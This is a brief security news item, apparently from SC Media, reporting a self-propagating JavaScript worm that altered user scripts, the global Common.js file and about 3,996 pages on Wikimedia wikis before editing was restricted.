Threat Intelligence, Malware

Wikimedia Foundation hit by JavaScript worm; editing restricted

RCE bug found in platform that powers Wikipedia, other "Wiki" sites

Coverage from Bleeping Computer indicates that the Wikimedia Foundation experienced a significant security incident involving a self-propagating JavaScript worm that vandalized pages and altered user scripts across multiple wikis, including Wikipedia.

The incident began when a malicious script, hosted on Russian Wikipedia and allegedly linked to previous attacks, was executed. This script modified a global JavaScript file, causing it to spread as a worm. The worm injected malicious loaders into user scripts and the global MediaWiki:Common.js file. When a user's script was modified, it would automatically load the malicious script, and if the user had sufficient privileges, it would also infect the global script, affecting all users.

The worm also edited random pages, inserting hidden JavaScript loaders. Approximately 3,996 pages were modified, and around 85 users had their common.js files overwritten before Wikimedia engineers temporarily restricted editing to investigate and revert the changes.

Source: Bleeping Computer

Related

Related Events

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

CorruptionData MiningDeauthentication AttackDeepfakeDictionary AttackDistributed ScansDomain HijackingDumpSecMorris WormReconnaissance

You can skip this ad in 5 seconds